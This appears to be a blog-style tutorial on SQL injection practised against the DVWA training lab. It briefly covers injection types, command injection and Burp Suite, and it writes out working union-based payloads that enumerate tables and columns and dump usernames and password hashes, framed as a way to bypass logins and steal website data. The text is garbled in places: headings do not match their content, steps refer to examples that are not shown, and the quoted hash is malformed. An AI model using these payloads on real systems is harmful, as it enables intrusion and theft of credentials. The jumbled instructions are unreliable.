Let's bypass the login and database of the website
How to do SQL Injection
In a SQL injection attack, malicious code is inserted at the end of the website URL in the input fields or address bar. By using it, you can delete, modify or steal the data by entering the database of a website.
- Error-based SQL Injection
- Union-based SQL Injection
- Blind SQL Injection
- Out-of-band SQL Injection
1. Error based
An attack in an error SQL intentionally inserts a query in which the server must fetch from the database and show some error and take advantage of it and hack the whole thing.
2. Union based
The UNION SQL operator combines the results of two or more SELECT statements into a single result.
3. Blind SQL based
Blind SQL is a type of attack in which the attacker passes a question type query that answers yes or no to the database after the execution
4. Out-of-band(OOB) SQL based
💡 In simple word command injection is performed where the page is executing a command
- Open the command injection page on dvwa, also available in mutillidae
- First, copy paste the given command to understand what it does.
- The command on this page is being injected because the ip address given here is output by pinging the address,
- And ping is the code of a command so we can inject any workable command here
Tool needed : Burpsuit
- Open the burpsuit and intercept the page
- now replace the id value as like that in example
Now click on the farword button
- Choose security mode on High
- Now click Sql enjection and Click here to change your ID.
Now click on the Submit button
Union Based Attack
In this attack, we will learn how tables, columns and values are extracted from the database.
💡 We are currently testing on a low security mode. If you want, you can try the medium and high label by following the example given above.
Check the total column in database
In this we intentionally enter the column number. So that we can know that there are no more columns than this. And in this way we get to know how many columns are in the database
- Enter this cybNg' ORDER BY 1,2,3 # code in the input box and submit
- Now you will see an error like Unknown column '3' in 'order clause'
Now click on submit button
Now you will see an error, this means that the value (1,2,3) for the column you have given is probably more or less, so you have to check each time until you see an error.
Now check again with only (1,2)
As soon as you check (1,2), you see no error. This means that there are 2 columns in this table.
Get table name of database
cybNg' UNION SELECT table_name,null from information_schema.tables WHERE table_schema=database() #
Here we find two table that name is guestbook and users
Get column name of database
cybNg' UNION SELECT column_name,null from information_schema.columns WHERE table_schema=database() #
Here we find many column name like that comment_id , comment and name etc.
Get column Value of database
cybNg' UNION SELECT user,password from users #
Here we find many column value where username and password like that admin , 5f4dcc3b5aa765d61d8327deb882cf99t (md5 encoded) etc.
💡 You can also use the sqlMap tool for SQL injection.